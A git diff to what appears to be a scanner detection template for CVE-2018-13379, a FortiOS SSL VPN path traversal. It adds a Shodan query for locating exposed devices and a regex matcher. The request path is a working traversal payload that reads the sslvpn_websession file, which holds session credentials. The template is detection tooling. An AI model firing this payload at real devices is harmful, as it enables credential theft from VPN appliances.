diff --git a/cves/2018/CVE-2018-13379.yaml b/cves/2018/CVE-2018-13379.yaml
index 176a17dba7..ca3b635eb6 100644
--- a/cves/2018/CVE-2018-13379.yaml
+++ b/cves/2018/CVE-2018-13379.yaml
@@ -14,15 +14,19 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2018-13379
     cwe-id: CWE-22
-  tags: cve,cve2018,fortios,cisa
+  metadata:
+    verified: true
+    shodan-query: http.html:"/remote/login" "xxxxxxxx"
+  tags: cve,cve2018,fortios,cisa,lfi
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
-    matchers:
-      - type: word
-        words:
-          - "var fgt_lang"
 
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - '^var fgt_lang ='
 # Enhanced by mp on 2022/05/12